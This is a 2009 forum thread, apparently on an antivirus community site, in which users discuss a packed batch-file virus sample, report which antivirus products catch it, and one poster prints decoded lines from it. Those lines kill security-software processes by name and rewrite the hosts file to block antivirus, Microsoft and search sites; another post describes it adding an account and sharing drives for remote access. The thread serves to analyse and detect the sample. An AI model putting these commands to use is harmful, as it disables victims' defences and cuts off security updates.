Original poster: 小v可

[Virus sample] My friend packed a virus! He says it evades NOD32!

Lelouch
Posted on 2009-7-27 10:56:26
date/time: 2009-7-27 10:55:53
filename: yangben.rar
original path: c:\Documents and Settings\Administrator\桌面\
filesize: 66.09 KB
virusname: Generic.Qhost
suggestion: Save & Delete
signatureId: 914441
yaofo7kafan
Posted on 2009-7-27 11:41:57
Why did Rising 2010 remove the virus and ask me to reboot, yet a new account got added and the C and D drives were fully shared? Frustrating. Rising, this is the second time you've let me down.
Sherry.ai
Posted on 2009-7-27 11:54:33
An unpacked .bat file.
qqqx123
Posted on 2009-7-27 11:54:57
It does get through, indeed.
495228535
Posted on 2009-7-27 13:01:53
Quoting strawman0719, posted 2009-7-27 00:13:
@echo off
%na2q%
%random%%random%%random%%random%%random%%random%%random%
%1xp5%
%random%%random%%random%%random%%random%%random%%random%
%bcsw%
%random%%random%%random%%random%%random%%random%% ...

Looks like nothing special, then.
寻找周宇轩
Posted on 2009-7-27 13:10:49
An ASP trojan plus a batch file. After it adds a new account the machine can be remotely controlled, and sharing the C drive is there to obtain administrator access. Still, a virus like this would only get run by someone taken in through social engineering.
寻找周宇轩
Posted on 2009-7-27 13:15:30
</gre_replace>
<gr_replace lines="63" cat="clarify" orig="这几个关键进程杀掉">
It kills these key processes.
%Q博士% norton*
%Q博士% av*
%Q博士% fire*
%Q博士% anti*
%Q博士% spy*
%Q博士% bullguard
%Q博士% PersFw
%Q博士% KAV*
%Q博士% ZONEALARM
%Q博士% SAFEWEB
%Q博士% OUTPOST
%Q博士% nv*
%Q博士% nav*
%Q博士% F-*
%Q博士% ESAFE
%Q博士% cle
%Q博士% BLACKICE
%Q博士% def*
这几个关键进程杀掉

%Q博士2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts

These sites are pointed to 127.0.0.1 in the hosts file.
yaofo7kafan
Posted on 2009-7-27 13:53:07
Why doesn't 微丶 block it when Q博士 runs?
q4068586
Posted on 2009-7-27 13:59:35
AVG
Infected: BAT/Generic
wangyunxi80
Posted on 2009-7-27 18:11:39
Avira took it out easily.